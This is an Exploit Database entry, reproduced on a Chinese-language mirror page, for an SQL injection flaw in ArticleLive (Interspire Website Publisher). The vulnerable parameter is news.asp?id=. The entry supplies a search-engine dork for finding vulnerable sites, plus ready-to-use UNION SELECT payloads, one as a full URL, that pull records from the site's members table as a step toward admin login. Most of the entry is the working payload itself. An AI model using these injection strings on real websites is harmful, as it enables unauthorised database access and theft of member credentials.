ArticleLive (Interspire Website Publisher) – SQL Injection

• Exploit Database
• 10 阅读

• 作者： Ra3cH
  日期： 2010-05-07
• 类别：

  • webapps
  平台：

  • asp
• 来源：https://www.exploit-db.com/exploits/12526/

• *******************************************************************************
  # Author : ra3ch
  # Product: ArticleLive (Interspire Website Publisher)
  # Price: N/A
  # Site : www.dz4all.com/cc
  # Dork : "Website by Spokane Web Communications" 
  # Risk : High 
  *
  **Vulnerable script: news.asp?id= (SQL-injection)
  *
  ---------------------------------------------------------
  *
  *
  **http://server/[path]/news.asp?id=[SQL Inject]
  *
  *
  **news.asp?id=34 union select 1,2,3,4,5,6,7,8,9,10,11 from members
  *
  *
  **Exploit: 
  *
  **http://server/news.asp?id=118%20union%20select%201,2,3,4,5,6,7,8,9,10,11%20from%20members
  
  **Admin Login->
  *
  *
  **http://server/[path]/Use your intelligence
  *
  *""""""""""""""""""""
  ** Greetz to : ALLAH 
  ** All Members ofhttp://www.DZ4All.cOm/Cc
  **And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....